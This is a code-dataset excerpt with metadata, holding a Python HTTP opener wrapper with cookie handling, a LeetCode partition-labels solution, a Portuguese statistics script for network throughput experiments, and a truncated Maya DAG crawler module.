)\r\n", "sub_path": "engine.py", "file_name": "engine.py", "file_ext": "py", "file_size_in_byte": 8577, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "utils.utils.MetricLogger", "line_number": 30, "usage_type": "call"}, {"api_name": "utils.utils.SmoothedValue", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.utils.warmup_lr_scheduler", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 56, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 
62, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 62, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "utils.utils.reduce_dict", "line_number": 74, "usage_type": "call"}, {"api_name": "math.isfinite", "line_number": 78, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.utils.is_main_process", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 114, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 140, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 147, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 159, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 165, "usage_type": "call"}, {"api_name": "utils.utils.mkdir", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 179, "usage_type": "call"}, {"api_name": "eval_func.eval_detection", "line_number": 181, "usage_type": "call"}, {"api_name": "eval_func.eval_search_cuhk", "line_number": 183, "usage_type": "call"}, {"api_name": "eval_func.eval_search_prw", "line_number": 195, "usage_type": "call"}, {"api_name": "eval_func.eval_search_mvn", "line_number": 206, "usage_type": "call"}, {"api_name": "config.ConfigMVN", "line_number": 215, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "310695109", "text": "# coding=utf8\r\n\r\nfrom urllib.request import build_opener, HTTPCookieProcessor, Request\r\nfrom urllib.parse import urlparse, urlunparse, urlencode, parse_qs\r\nfrom http.cookiejar import LWPCookieJar, DefaultCookiePolicy\r\nimport os.path\r\n\r\nclass Opener:\r\n def __init__(self, cookie_path=None):\r\n self.opener = build_opener()\r\n self.cookiejar = LWPCookieJar()\r\n self.set_cookie_path(cookie_path)\r\n self.opener.add_handler(HTTPCookieProcessor(self.cookiejar))\r\n self.opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20120101 Firefox/11.0')]\r\n self.last_request = None\r\n self.last_response = None\r\n\r\n @property\r\n def request_info(self):\r\n pass\r\n\r\n @property\r\n def response_info(self):\r\n pass\r\n\r\n def set_cookie_path(self, path):\r\n self.cookiejar.filename = path\r\n try:\r\n os.path.exists(path) and self.cookiejar.load()\r\n except:\r\n pass\r\n\r\n def set_headers(self, arg={}, **kwargs):\r\n if not arg and not kwargs:\r\n return\r\n headers = 
dict(self.opener.addheaders)\r\n headers.update(arg)\r\n headers.update(kwargs)\r\n self.opener.addheaders = list(headers.items())\r\n\r\n def set_cookies(self, *args, **kwargs):\r\n for arg in args:\r\n cookie = DefaultCookiePolicy(**arg)\r\n self.cookiejar.set_cookie(cookie)\r\n kwargs and self.cookiejar.set_cookie(DefaultCookiePolicy(**kwargs))\r\n\r\n def save_cookies(self, cookie_path=None):\r\n if cookie_path or self.cookiejar.filename:\r\n self.cookiejar.save(cookie_path)\r\n\r\n def urlopen(self, url, param=None, data=None, headers={}, proxies={}, timeout=None, encoding='utf8', errors='strict'):\r\n \"\"\" 打开目标链接, 返回一个 HttpResponse对象.\r\n\r\n @url(str/Request): 目标链接.\r\n @param(str/dict/pairs tuple): query string.\r\n @data(bytes/str/dict): post data.\r\n @headers(dict): http request headers.\r\n @proxies(dict): 代理, 如:{'http': 'xx.xx.xx.xx:3128', 'https': 'xxx.xxx.xxx.xxx:8080'}.\r\n @timeout(int): http request timeout.\r\n @encoding/errors(str): url编码.\r\n \"\"\"\r\n if param:\r\n full_url = isinstance(url, Request) and url.get_full_url() or url\r\n url_parse_dict = urlparse(full_url)._asdict()\r\n query_param = url_parse_dict.get('query') + (isinstance(param, str) and param or urlencode(param, encoding, errors))\r\n url_parse_dict['query'] = query_param\r\n full_url = urlunparse(url_parse_dict.values())\r\n request = Request(full_url)\r\n else:\r\n request = isinstance(url, Request) and url or Request(url)\r\n if data:\r\n if isinstance(data, bytes):\r\n request.data = data\r\n elif isinstance(data, str):\r\n request.data = data.encode(encoding, errors)\r\n else:\r\n request.data = urlencode(data).encode(encoding, errors)\r\n for key, value in headers.items():\r\n request.add_header(key, value)\r\n for proxy_type, proxy_host in proxies.items():\r\n request.set_proxy(proxy_host, proxy_type)\r\n self.last_request = request\r\n self.last_response = self.opener.open(request, timeout=timeout)\r\n return self.last_response\r\n\r\n def clear(self):\r\n self.last_request = None\r\n self.last_response = None\r\n", "sub_path": "Python/libs/kisopener.py", "file_name": "kisopener.py", "file_ext": "py", "file_size_in_byte": 3482, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "urllib.request.build_opener", "line_number": 10, "usage_type": "call"}, {"api_name": "http.cookiejar.LWPCookieJar", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.request.HTTPCookieProcessor", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.path.exists", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 29, "usage_type": "name"}, {"api_name": "http.cookiejar.DefaultCookiePolicy", "line_number": 43, "usage_type": "call"}, {"api_name": "http.cookiejar.DefaultCookiePolicy", "line_number": 45, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 63, "usage_type": "argument"}, {"api_name": "urllib.parse.urlparse", "line_number": 64, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 65, "usage_type": "call"}, {"api_name": "urllib.parse.urlunparse", "line_number": 67, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 68, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 70, "usage_type": "argument"}, {"api_name": "urllib.parse.urlencode", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "587109311", "text": 
"from typing import List\nclass Solution:\n def partitionLabels(self, S: str) -> List[int]:\n lastPos, seen, currMax = {}, set(), -1\n res = []\n for i in range(0, 26):\n c = chr(97+i)\n lastPos[c] = S.rfind(c)\n for i, c in enumerate(S):\n # Encounter new index higher than currMax\n if i > currMax:\n res.append(currMax+1)\n currMax = max(currMax, lastPos[c])\n res.append(len(S))\n ans = [res[i]-res[i-1] for i in range(1, len(res))]\n return ans", "sub_path": "leetcode/763. Partition Labels/soln.py", "file_name": "soln.py", "file_ext": "py", "file_size_in_byte": 555, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "typing.List", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "169046521", "text": "#!/usr/bin/python\n#Aplicacao que reune diversas funcoes estatisticas - Versao 01/07/18\n\nimport sys\nimport math\nimport numpy as np\nfrom matplotlib import pyplot as pl\nfrom grafico import desenha\n#import seaborn as sns\n#sns.set()\n#Bruno\nfrom MontaVetores import RetornaVetoresArquivoEstatistica as vetores_estatistica\n\n\nAPROX = 2\t\t\t#Numero de casas decimais para aproximacao\n\n#Calculo da media\ndef media(L):\n\tsoma=0.0\n\tfor i in L:\n\t\tsoma+=i\n\treturn soma/len(L)\n\n#Calculo da variancia\ndef variancia(L):\n\tsoma=0.0\n\tx=media(L)\n\tfor i in L:\n\t\tsoma+=((i-x)**2)\n\treturn soma/(len(L)-1)\n\n#Calculo do desvio padrao\ndef desvioPadrao(L):\n\treturn math.sqrt(variancia(L))\n\n#Calculo do coeficiente de variacao\ndef cv(L):\n\treturn desvioPadrao(L)/media(L)\n\n#Calculo da covariancia\ndef covariancia(L1,L2):\n\tcov=0\n\tfor i in range(len(L1)):\n\t\tcov+=(L1[i]-media(L1))*(L2[i]-media(L2))\n\treturn cov\n\n#Calculo da correlacao\ndef correlacao(L1,L2):\n\treturn covariancia(L1,L2)/(desvioPadrao(L1)*desvioPadrao(L2))\n\n#Calculo do intervalo de confianca\ndef ic(L,tabela):\n\tintervalo=[]\n\tx=media(L)\n\terroPadrao=desvioPadrao(L)/math.sqrt(len(L))\n\t#tabela=raw_input('Digite o valor da tabela t/z para %d graus de liberdade: ' %(len(L)-1))\n\tliminf=x-(float(tabela)*erroPadrao)\n\tlimsup=x+(float(tabela)*erroPadrao)\n\tintervalo.append(round(liminf,APROX))\n\tintervalo.append(round(limsup,APROX))\n\treturn intervalo\n\n#Calculo do Teste T\ndef icTesteT(L1,L2):\n\tintervalo=[]\n\tx1=media(L1)\n\tx2=media(L2)\n\tep1=variancia(L1)/len(L1)\n\tep2=variancia(L2)/len(L2)\n\ts=math.sqrt(ep1+ep2)\n\tnumeradorv=(ep1+ep2)**2\n\tdenominadorv=((ep1**2/(len(L1)+1))+(ep2**2/(len(L2)+1)))\n\tv=(numeradorv/denominadorv)-2\n\ttabela=raw_input('Digite o valor da tabela t para %f graus de liberdade: ' %v)\n\tintervalo.append((x1-x2)-(float(tabela)*s))\n\tintervalo.append((x1-x2)+(float(tabela)*s))\n\treturn intervalo\n\n#Calculo das diferencas de amostras\ndef difAmostra(L1,L2):\n\tif len(L1)!=len(L2):\n\t\tprint(\"Tamanhos de amostras diferentes\")\n\t\treturn\n\tdif=[]\n\tfor i in range(len(L1)):\n\t\tdif.append(L1[i]-L2[i])\n\treturn dif\n\n#Calculo da regressao linear\ndef regressaoLinear(x,y):\n\tsomatoriox = 0\n\tsomatorioy = 0\n\tsomatorioxy = 0\n\tsomatoriox2 = 0\n\tSSY = 0\n\tsomaestimate = 0\n\tsomae = 0\n\tsomae2 = 0\n\n\tn = len(x)\t\t\t\t\t\t#Quantidade de amostras\n\tSS0 = n * media(y)**2\t\t\t\t\t#Soma dos quadrados da media de y - SS0\n\n\tfor i in range(n):\n\t\tsomatoriox += x[i]\t\t\t\t#Somatorio de x\n\t\tsomatorioy += y[i]\t\t\t\t#Somatorio de y\n\t\tsomatorioxy += x[i] * y[i]\t\t\t#Somatorio de x * y\n\t\tsomatoriox2 += x[i]**2\t\t\t\t#Soma dos quadrados de x\n\t\tSSY += 
y[i]**2\t\t\t\t\t#Soma dos quadrados de y - SSY\n\n\t#Calculos das estimativas\n\tb1 = round((somatorioxy - n * media(x) * media(y)) / (somatoriox2 - n * (media(x)**2)),APROX)\t#b1\n\tb0 = round(media(y) - (b1 * media(x)),APROX)\t\t\t\t\t\t\t#b0\n\n\tfor i in range(n):\n\t\testimate = b0 + (b1 * x[i])\t\t\t#Estimativa\n\t\tsomaestimate += estimate\t\t\t#Somatorio das estimativas\n\t\te = y[i] - estimate\t\t\t\t#Erro\n\t\te2 = e**2\t\t\t\t\t#Erro quadrado\n\t\tsomae += e\t\t\t\t\t#Soma dos erros\n\t\tsomae2 += e2\t\t\t\t\t#Soma dos erros quadrados\n\n\tSST = SSY - SS0\t\t\t\t\t\t#Soma total dos quadrados - SST\n\tSSE = SSY - (b0 * somatorioy) - (b1 * somatorioxy)\t#Soma dos erros quadrados (com regressao) - SSE\n\n\t#Calculos de R2 e Se\n\tR2 = 1 - (SSE / SST)\t\t\t\t\t#Coeficiente de detelminacao - R2\n\tSe = math.sqrt(SSE / (n - 2))\t\t\t\t#Desvio padrao de erros - Se\n\n\t#Calculos dos intervalos de confianca para regressoes\n\tSb0 = round(Se * math.sqrt((1 / n) + (media(x)**2 / (somatoriox2 - (n * media(x)**2)))),APROX)\n\tSb1 = round(Se / (math.sqrt(somatoriox2 - (n * media(x)**2))),APROX)\n\n\ttabela = float(raw_input('Digite o valor da tabela t/z para %d graus de liberdade: ' %(n - 2)))\n\n\tb0min = b0 - tabela * Sb0\t\t\t\t#Calculo dos intervalos de confianca\n\tb0max = b0 + tabela * Sb0\n\tb1min = b1 - tabela * Sb1\n\tb1max = b1 + tabela * Sb1\n\n\t#print 'Intervalo de confianca b0: %0.4f - %0.4f' %(b0min,b0max)\n\t#print 'Intervalo de confianca b1: %0.4f - %0.4f' %(b1min,b1max)\n\n\t#Calculos dos intervalos de confianca para predicoes\n\txp = int(raw_input('Digite o valor da amostra futura (Xp): '))\n\tm = 1\n\typ = b0 + b1 * xp\n\tSy = round(Se * math.sqrt((1 / m) + (1 / n) + (((xp - media(x))**2) / (somatoriox2 - (n * media(x)**2)))),APROX)\n\n\typmin = yp - tabela * Sy\n\typmax = yp + tabela * Sy\n\t#print 'Intervalo de confianca previsto (Yp): %0.4f - %0.4f' %(ypmin,ypmax)\n\n\t#Criacao dos graficos\n\tpl.title('Regressao Linear')\n\tpl.xlim(0,max(x)+1)\n\tpl.ylim(0,max(y)+1)\n\n\tpl.plot(x,y,'o')\n\n\tx2=np.array([min(x),max(x)])\n\ty2=np.array([media(y),media(y)])\n\tpl.plot(x2,b0+b1*x2,'-')\t\t\t\t#Regressao\n\tpl.plot(x2,y2,'-')\t\t\t\t\t#Media\n\n\tpl.text(max(x)+0.2,media(y),'y')\n\tpl.text(0.2,max(y),'y=%0.4f+%0.4fx' %(b0,b1))\n\tpl.text(0.2,max(y)-0.5,'R2: %0.4f' %R2)\n\tpl.text(0.2,max(y)-1.0,'Se: %0.4f' %Se)\n\tpl.text(0.2,max(y)-1.5,'e: %0.4f' %somae)\n\tpl.text(0.2,max(y)-2.0,'e2: %0.4f' %somae2)\n\n\tpl.show()\n\ndef converteBytesEmMegabits(vetor):#Recebe um vetor\n vet_aux = []\n for i in vetor:\n vet_aux.append(i*0.000008)\n return vet_aux\n\ndef converteBytesEmMegabyte(vetor):#Recebe um vetor\n vet_aux = []\n for i in vetor:\n vet_aux.append(i*0.000001)\n return vet_aux\n\n\n#####Leitura de arquivos de resultados\n#input = open('stp-16x4.txt', 'r')\n#S5 = [float(foo) for foo in input.readlines()]\n#input.close()\n\n'''\n############################################################################\nBruno TCC\n############################################################################\n'''\n\nteste = '2Iperf' #SemIperf,1Iperf,2Iperf\ncenario = '1' #1,2,3\n\ns1_tx1,s1_tx2,s1_tx3,s3_rx1,s3_rx2=vetores_estatistica('/home/bruno/ryu/Bruno/Resultados/Teste/Cenario'+cenario+'_'+teste+'.txt')\n\n#Megabits\ns1_tx1 = converteBytesEmMegabits(s1_tx1)\ns1_tx2 = converteBytesEmMegabits(s1_tx2)\ns1_tx3 = converteBytesEmMegabits(s1_tx3)\ns3_rx1 = converteBytesEmMegabits(s3_rx1)\ns3_rx2 = converteBytesEmMegabits(s3_rx2)\n'''\n#Megabytes\ns1_tx1 = 
converteBytesEmMegabyte(s1_tx1)\ns1_tx2 = converteBytesEmMegabyte(s1_tx2)\ns1_tx3 = converteBytesEmMegabyte(s1_tx3)\ns3_rx1 = converteBytesEmMegabyte(s3_rx1)\ns3_rx2 = converteBytesEmMegabyte(s3_rx2)\n'''\n#####Valores de tabelas T/Z\ntam = len(s1_tx1)\n\nif tam > 30:\n\ttab = '1.96'\nif tam == 30:\n\ttab = '2.045'\nif tam == 25:\n\ttab = '2.064'\nif tam == 20:\n\ttab = '2.093'\nif tam == 15:\n\ttab = '2.145'\n\n\n\n#tab='1.645'\t#>30 90%\n#tab='1.699'\t#30 90%\n#tab='1.711'\t#25 90%\n#tab='1.729'\t#20 90%\n#tab='1.761'\t#15 90%\n\n#####Medias\nmedia_s1_tx1=round(media(s1_tx1),APROX)\nmedia_s1_tx2=round(media(s1_tx2),APROX)\nmedia_s1_tx3=round(media(s1_tx3),APROX)\nmedia_s3_rx1=round(media(s3_rx1),APROX)\nmedia_s3_rx2=round(media(s3_rx2),APROX)\n'''\nme5=round(media(E5),APROX)\nme10=round(media(E10),APROX)\nme15=round(media(E15),APROX)\nme20=round(media(E20),APROX)\n\nmt5=round(media(T5),APROX)\nmt10=round(media(T10),APROX)\nmt15=round(media(T15),APROX)\nmt20=round(media(T20),APROX)\n\nmi5=round(media(I5),APROX)\nmi10=round(media(I10),APROX)\nmi15=round(media(I15),APROX)\nmi20=round(media(I20),APROX)\n'''\n#####Intervalos de Confianca\nic_s1_tx1=ic(s1_tx1,tab)\nic_s1_tx2=ic(s1_tx2,tab)\nic_s1_tx3=ic(s1_tx3,tab)\nic_s3_rx1=ic(s3_rx1,tab)\nic_s3_rx2=ic(s3_rx2,tab)\n\n'''\nie5=ic(E5,tab)\nie10=ic(E10,tab)\nie15=ic(E15,tab)\nie20=ic(E20,tab)\n\nit5=ic(T5,tab)\nit10=ic(T10,tab)\nit15=ic(T15,tab)\nit20=ic(T20,tab)\n\nii5=ic(I5,tab)\nii10=ic(I10,tab)\nii15=ic(I15,tab)\nii20=ic(I20,tab)\n'''\n#####Impressao dos resultados\n#EntradaVideo\nprint('\\n\\nMedia s3_rx1: '+str(media_s3_rx1))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s3_rx1),APROX)))\nprint('Variancia: '+str(round(variancia(s3_rx1),APROX)))\nprint('IC s3_rx1: '+str(ic_s3_rx1))\n\n#SaidaVideo\nprint('\\n\\nMedia s1_tx1: '+str(media_s1_tx1))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s1_tx1),APROX)))\nprint('Variancia: '+str(round(variancia(s1_tx1),APROX)))\nprint('IC s1_tx1: '+str(ic_s1_tx1))\n\n#EntradaIperf\nprint('\\n\\nMedia s3_rx2: '+str(media_s3_rx2))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s3_rx2),APROX)))\nprint('Variancia: '+str(round(variancia(s3_rx2),APROX)))\nprint('IC s3_rx2: '+str(ic_s3_rx2))\n\n#Saida Iperf 1\nprint('\\n\\nMedia s1_tx2: '+str(media_s1_tx2))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s1_tx2),APROX)))\nprint('Variancia: '+str(round(variancia(s1_tx2),APROX)))\nprint('IC s1_tx2: '+str(ic_s1_tx2))\n\n#Saida Iperf 2\nprint('\\n\\nMedia s1_tx3: '+str(media_s1_tx3))\nprint('Desvio Padrao: '+str(round(desvioPadrao(s1_tx3),APROX)))\nprint('Variancia: '+str(round(variancia(s1_tx3),APROX)))\nprint('IC s1_tx3: '+str(ic_s1_tx3))\n\n\n\n\n\n\n\n\n\n\n\n\n#####Geracao dos graficos\nif teste == 'SemIperf':\n\tparam1=[media_s3_rx1,media_s1_tx1]\n\tparam2=[(ic_s3_rx1[1]-ic_s3_rx1[0])/2,(ic_s1_tx1[1]-ic_s1_tx1[0])/2]\n\tnome = 'Cenario '+cenario+' sem carga de trabalho'\n\tdesenha(param1,param2, 2000,nome,teste)\nelif teste == '1Iperf':\n\tparam1=[media_s3_rx1,media_s1_tx1,media_s3_rx2,media_s1_tx2]\n\tparam2=[(ic_s3_rx1[1]-ic_s3_rx1[0])/2,(ic_s1_tx1[1]-ic_s1_tx1[0])/2,(ic_s3_rx2[1]-ic_s3_rx2[0])/2,(ic_s1_tx2[1]-ic_s1_tx2[0])/2]\n\tnome = 'Cenario '+cenario+' com uma carga de trabalho'\n\tdesenha(param1,param2, 5000,nome,teste)\nelse:\n\tparam1=[media_s3_rx1,media_s1_tx1,media_s3_rx2,media_s1_tx2,media_s1_tx3]\n\tparam2=[(ic_s3_rx1[1]-ic_s3_rx1[0])/2,(ic_s1_tx1[1]-ic_s1_tx1[0])/2,(ic_s3_rx2[1]-ic_s3_rx2[0])/2,(ic_s1_tx2[1]-ic_s1_tx2[0])/2,(ic_s1_tx3[1]-ic_s1_tx3[0])/2]\n\tnome = 'Cenario '+cenario+' com 
duas cargas de trabalho'\n\tdesenha(param1,param2, 8000,nome,teste)\n\n\n\n'''\nparam1=[ms10,mt10,me10,mi10]\nparam2=[(is10[1]-is10[0])/2,(it10[1]-it10[0])/2,(ie10[1]-ie10[0])/2,(ii10[1]-ii10[0])/2]\ndesenha(param1,param2,200,'Trace 128 maps/4 reduces')\n\nparam1=[ms15,mt15,me15,mi15]\nparam2=[(is15[1]-is15[0])/2,(it15[1]-it15[0])/2,(ie15[1]-ie15[0])/2,(ii15[1]-ii15[0])/2]\ndesenha(param1,param2,200,'Trace 192 maps/16 reduces')\n\nparam1=[ms20,mt20,me20,mi20]\nparam2=[(is20[1]-is20[0])/2,(it20[1]-it20[0])/2,(ie20[1]-ie20[0])/2,(ii20[1]-ii20[0])/2]\ndesenha(param1,param2,350,'Trace 256 maps/16 reduces')\n'''\n", "sub_path": "Bruno/Funcoes/estatistica_tcc.py", "file_name": "estatistica_tcc.py", "file_ext": "py", "file_size_in_byte": 9856, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "math.sqrt", "line_number": 34, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 55, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 127, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 130, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 131, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 154, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 156, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 156, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 161, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, 
{"api_name": "MontaVetores.RetornaVetoresArquivoEstatistica", "line_number": 201, "usage_type": "call"}, {"api_name": "grafico.desenha", "line_number": 331, "usage_type": "call"}, {"api_name": "grafico.desenha", "line_number": 336, "usage_type": "call"}, {"api_name": "grafico.desenha", "line_number": 341, "usage_type": "call"}]} +{"seq_id": "71060708", "text": "# -------------------------------------------------------------------------- #\n# ---------------------------------------------------------------- HEADER -- #\n\"\"\"\n@organization: Kludgeworks LLC\n\n@description: Utilities for working with the Maya DAG\n\n@author: Ed Whetstone\n\n@applications: MAYA\n\"\"\"\n\n# -------------------------------------------------------------------------- #\n# --------------------------------------------------------------- IMPORTS -- #\n# built-in\nfrom itertools import chain\n\n# internal\nimport vfx_utils.omni.slog as slog\nfrom vfx_utils.omni.data_types import TreeDict, TreeNode\nimport vfx_utils.mirage.api_utils as api\nfrom vfx_utils.mirage.api_utils import msplit\nfrom vfx_utils.mirage.maya_callbacks.watchers import SceneWatcher\n\n# domain\nimport maya.OpenMaya as om\n\n# -------------------------------------------------------------------------- #\n# --------------------------------------------------------------- GLOBALS -- #\nDAGNODE = TreeNode('__dagnode__', repr_='DAGNODE')\n\nlogger = slog.Logger()\nlogger.level = 3\n\ncb_logger = slog.Logger('DAG_Crawler_Callbacks')\ncb_logger.formatter = lambda msg, lvl, **_: \"DAG_CRAWLER: {0}\".format(msg)\ncb_logger.level = 3\n\n# -------------------------------------------------------------------------- #\n# --------------------------------------------------------- DAG TRAVERSAL -- #\ndef dag_generator():\n iterator = om.MItDag(om.MItDag.kDepthFirst)\n current_item_getter = iterator.currentItem\n next_ = iterator.next\n while not iterator.isDone():\n yield current_item_getter()\n next_()\n raise StopIteration\n\n# -------------------------------------------------------------------------- #\n# ----------------------------------------------------------- DAG CRAWLER -- #\nclass DagCrawler(object):\n \"\"\"the dag crawler is a model of the maya dag, represented with\n ApiNodes in a nested TreeDict. See the data_types module for more\n information on TreeDicts and TreeNodes\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.key_type = DAGNODE\n self.tree = TreeDict(*args, **kwargs)\n self.path_dict = dict()\n\n def populate(self, nodes=None):\n \"\"\"Create a dict representing the full dag path for all objects\n in the scene. by default this includes all DAG nodes. 
Subclasses\n can create their own populate functions.\"\"\"\n tree = self.tree = TreeDict()\n if nodes is None:\n nodes = dg_iter(iterator_type='dag').to_api_nodes()\n else:\n nodes = list(nodes)\n node_chain = list(chain(*[([node]\n + node.ancestors\n + node.descendants)\n for node in nodes]))\n nodes = list(set(node_chain))\n nodes = [node for node in nodes if node.parent]\n\n # build path tree\n for api_node in nodes:\n path = self._api_node_to_path(api_node)\n self._save_path(api_node, path)\n path.append(self.key_type)\n tree.set_at_path(path, api_node)\n\n def _save_path(self, api_node, path):\n \"\"\"cache the given api node's name path\"\"\"\n self.path_dict[api_node] = tuple(path)\n\n def _clear_saved_path(self, api_node):\n cb_logger.debug('clearing saved path for {}', api_node)\n self.path_dict.pop(api_node)\n\n def repath(self, api_node, old_path, new_path, repath_descendants=False):\n \"\"\"Do the necessary work to remove an old path and replace it with\n a new one. If necessary, also repath all the descendants of the\n given node\"\"\"\n self.tree.repath(old_path, new_path)\n self._clear_saved_path(api_node)\n self._save_path(api_node, new_path)\n if repath_descendants:\n descendants = api_node.descendants\n for node in descendants:\n new_desc_path = self._api_node_to_path(node)\n self._clear_saved_path(node)\n self._save_path(node, new_desc_path)\n\n def _branch_at_split(self, split_path):\n \"\"\"get the TreeNode represented by the path\"\"\"\n return self.tree.get_at_path(split_path)\n\n def _api_node_to_path(self, api_node, use_cache=False):\n \"\"\"return a path given an api node. If use_cache is True,\n attempt to return the cached version of the path\"\"\"\n if use_cache:\n try:\n return self.path_dict[api_node]\n except:\n pass\n path = msplit(api_node.long_name)[1:]\n return path\n\n def _api_node_to_node_path(self, api_node, use_cache=False):\n \"\"\"return the node hierarchy leading to this node\"\"\"\n path = self._api_node_to_path(api_node, use_cache=use_cache)\n path.append(self.key_type)\n return path\n\n def _path_to_api_node(self, split_path):\n \"\"\"given a name path, return the node at the end of it\"\"\"\n return self.tree.get_at_path(split_path)\n\n def branch_at_node(self, api_node):\n \"\"\"return the TreeNode represented by the given api_node\"\"\"\n path = self._api_node_to_path(api_node)\n return self._branch_at_split(path)\n\n def name_to_node(self, node_name):\n \"\"\"given the name of a node, return the api_node representation\"\"\"\n if node_name.startswith('|'):\n split_path = msplit(node_name[1:])\n else:\n split_path = msplit(node_name)\n return self._path_to_api_node(split_path + [self.key_type])\n\n def add_node(self, api_node):\n \"\"\"add a node to the DagCrawler model\"\"\"\n path = self._api_node_to_path(api_node)\n self._save_path(api_node, path)\n path.append(self.key_type)\n self.tree.set_at_path(path, api_node)\n\n def remove_node(self, api_node):\n \"\"\"remove a node from the DagCrawler model\"\"\"\n if api_node in 